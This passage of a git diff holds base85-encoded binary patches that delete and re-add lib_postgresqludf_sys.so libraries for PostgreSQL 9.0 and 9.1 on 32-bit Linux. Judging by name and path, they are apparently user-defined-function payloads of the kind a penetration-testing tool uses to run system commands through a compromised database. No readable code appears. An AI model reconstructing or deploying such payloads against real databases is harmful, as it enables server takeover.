ze#g0Sjz+@I&~R+?L0t;~QSzXRm53ii;NZA<3fK$UZXT2QLgC9SMqyp73lFSWQ$Ivg
z`gCJs5N^&sL=$VzUV;)r9%5ZvTaI^T`BtHZcVysLh_IOSMMvf@cxGMvXdVGx#|p@U
zoB?2NNsq&b(DsjS9voshggebXL9F4&UJ&`PexE;tGVfbm6P##&ScAP}ZuD~6^@il2
zn8Og&v`DjeEty3JIM?+8m(?~#BR>tN@ZS_~3@p>djQ(EkA^ILAMWBSIe<R)4jR6NT
zK#ZfnkM3kbpgsJ?hGVX_1WcEqoyk7up5NdZ%x%r7<WDKoscEH>xTh2yI_`5PEmk7}
z)5$GYr*M|Q|5yah-Ls_}`m&of2Kv|d2?e>JT9Kx|kyB;{7}?GEr`cPEXp-lhG9;Qz
z*uR|1sJ_9dAv0oA=iQr`MF)?Urlyk@gZlN$$@3j73|T5Akw&oL<OKM|t~`{JI5;&p
zIW>nlH4vFv?fS+!$QU-t64xBgWA-rXHI-+27cTN)+qqq_Nk-^*mS(mLe73Yr+_Xl>
zo^Z0@{Pc`E2n2$Y=l9fjX1y$)yr&dq)w#A#y)CQ|PptZtfs&I)!P4@brcx~o86q!t
zvIWB^*>?4F14Yu3;mW^TQ0ig=se~fC1nZay_wJ?SxxBSQ`Z^-}A~;~TreYTSlqG&A
z5Mng%Z?&Ggmm#<U#H<`kU4%82TC-hAz6mD`aHSOg!&ES>X41M5V9C~%bF=a9Qer{-
z95-wmS-tC;nVc*K&btD8zeB1}6867&oCVF@9HtW>r<OKrrAgRSM6*h9;l^O#g^fO&
z*&?m9f|zkPUlh>X-Mm`v?iEZ`kJ6Qxeg+U<uR<j4Z&gHi2}pZ-LeWA=Clx#hx~?Zr
z->-x|;ncEx<@?1ZokkAY+0Ok6ldcMgjnmGGvy%PObFHo}s0L}?Y>No?K0+o=pGxwe
zG*z^7P(sJ!647kD1SMd5o?pL~!8|hPZB+2s7kLfmz<_+fFX1z#8c4n50BkMC``6`R
z!ZxD0czB*Q?aINJxTvR^hY@0{uZM8mu5|ZgWzDn_)NHxbhF(&eX`PgY=3cPtiNT<E
zzR_!0F+az^6D9TohpG0I1Xm=NuS`-Nr=Hwr=JNr9nI8!_%Z!vYRJ5%5GGFGi+nuU>
zs@WGQeLl5bTt0a4;p;X`NB0>4cY|1!3tjJ?uFf$4h{g1FycMwI-#finm2i&4Vhm!i
ztPIb?tGSo&>-rfd)8bMSE*jP1S};QW%+eam6cy{-R41HH+W$FvD42EFB=8L@aV^cp
zo{J6{C6SR}_b_;!w{__wg{$axkN`u_ql10FR3dNr{Tq{wpQ}ZC0jCd50SHGd#_vz4
z;{_JpksS#k?$75K(|mou9N}FP-kD+O1@tez(Y9B%7I&~=^Z<N8?9TG2rvTm;Ms$_^
z+0OSAwz9VN+vRlY<d%R~ExyFH*edm{H7Mniy!ihLyK6w4^(!!R+^}7Cm*1oKnX9!z
zqO^xb!XD1>6O-dLUu9;aH{grQUgYsTQ>0Co4$=zYv5>ip^R853N^uZT*--i7p0La#
zAxdQ^pnY*Z5ZtKDY;gynf~Xbz<I(t=59))LqT#S(F8}B6fe033I7wwBS2Tsu`?xoP
z9O|F&-I0eJa9YH^%$qhN<l&e*iP^X?UvZAb2J}(#4|AgnCs~Fj#JjyQ_2Sq(2GK3A
zjeGA4aEON-X{DNtt!SU+jNiA7-%RqkV`tYOoP4WOL!4As=A2cq@MTv)&OV&0SBq2m
zO6vmA!bB10O`eCc*}}u$3@=5*E}jOamQzC`WG^+x#ltvRVfK8tHk7({2Of0qJzi)I
zecr3Y!$W7kYHIRBjOXpP@CAX_`)}SsbnjL0u0f>U{nRMrX1_ja^5363ba3Nfw8X>n
z?D1W`jwR!vycXf%Wd^2*uaDyf5F`h<G4*RQ+`b?#{W$=E*Cb000N)%O*8t@G+@f@8
S%(K{|PcA^3fcGGON`_Se(%)eK

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so
deleted file mode 100755
index ddf07c98e2bc18f3c1dcfd2f9da15baf62779f8e..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6512
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
Qm75aTq4$vj2|3}v05Cs36#xJL

diff --git a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..f24c3482406750bfc4d7d931409651a7e53ab21d
GIT binary patch
literal 3262
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

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so
deleted file mode 100755
index d1c700e90bb01a53c7df56f9abd1abd5e66a27e9..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6432
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
